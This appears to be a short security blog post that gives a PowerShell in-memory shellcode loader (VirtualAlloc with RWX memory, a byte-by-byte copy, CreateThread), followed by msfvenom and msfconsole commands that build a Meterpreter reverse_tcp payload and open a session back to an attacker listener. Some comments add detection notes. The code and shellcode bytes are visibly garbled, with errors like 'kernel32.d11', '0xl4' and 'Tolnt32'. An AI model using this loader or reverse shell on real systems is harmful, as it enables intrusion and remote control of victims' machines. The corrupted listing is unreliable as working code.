Simple In-Memory Injection

# P/Invoke declarations that get compiled into a helper type so the script can
# call native Win32 APIs directly: VirtualAlloc (reserve/commit memory),
# CreateThread (start a thread at an arbitrary address) and memset (byte copy).
# The listing is reproduced verbatim from the page.
$pos= '[DllImport("kernel32.d11")] 
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwpysize, uint flAllocationType, uint flProtect);[DllImport("kerne132.d11")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackpysize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

# Add-Type compiles the C# declarations above into an in-memory type at run
# time. Detection note: a PowerShell process defining a type that exposes
# VirtualAlloc/CreateThread is itself worth alerting on, independent of the
# payload that follows.
$malFunc = Add-Type -memberDefinition $pos -Name 11Win32" -namespace Win32Functions -p assthru;
# Stray no-op line (a bare type literal), kept as printed.
[Byte []];
# Raw shellcode as a byte array. These bytes are what the rest of the script
# executes; for a defender this array is the artifact to identify (Script
# Block Logging / AMSI see it in the clear here), not the small loader around it.
[Byte[]] $pyld = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0xl4,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x.26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xcl,0xcf,0xd,0xl,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0xl0,0x8b,0x4a,0x3c,0x8b,0x4c,0xll,0x78,0xe3,0x48,0xl,0xdl,0x51,0x8b,0x59,0x20,0xl,0xd3,0x8b,0x49,0xl8, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0xl, 0xd6, 0x31, 0xff, 0.xac, 0xcl,0xcf,0xd,0xl,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0xl,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0xlc,0xl,0xd3,0x8b,0x4,0x8b,0xl,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0xl2,0xeb,0x8d,0x5d,0x68,0x33 ,0x32 ,0x0 ,0x.0, 0x68, 0.x77, 0x73, 0x32 ,0x5f 0x7,0xff,0xd5,x90,0xl,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xac,0x10,0x74,0x8b,0x68,0x2,0x0,0xll,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0xl0,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x61,0x0,0x0,0x0,0x6a,0x06,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x0x24,0xe9,0x71,0xff,0xff,0xff,0xl,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
# Allocation size: at least one page (0x1000 bytes), grown to the payload
# length when the payload is larger than that.
$pysize= 0x1000;
if ($pyld.Length -gt 0x1000) {$pysize = $pyld.Length};
# VirtualAlloc(NULL, size, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE).
# A writable+executable (RWX) allocation requested from a PowerShell process is
# a strong, low-noise indicator; monitoring for it catches this loader pattern
# regardless of which payload bytes are used.
$z = $malFunc::VirtualAlloc(0,$pysize,0x3000,0x40);
# Copy the payload into the allocated region one byte at a time (the statement
# is split across two lines as printed).
for ($i=0;$i -le ($pyld.Length-1);$i++) {$malFunc::memset([IntPtr]($z.Tolnt32()+$i), $pyld
[$i], 1)} ;
# Start a new thread at the copied bytes, then park the script in an endless
# Start-Sleep loop so the process (and with it the thread) stays alive.
$malFunc::CreateThread(0,0,$z,0,0,0);for (;;) { Start-sleep 60 };
parrot@Userman:-$msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh -o payld.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 410 bytes
Final size of psh file: 3255 bytes
Saved as: payld.ps1
parrot@Userman:-$msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost; set lport 4444; set ExitOnSession false; exploit -j"
[*] Meterpreter session l opened ( -> 
meterpreter > whoami
  1. ,




Prakash Ashok, Security Analyst at WeSecureApp, CTF player, Blockchain developer and Security Researcher.





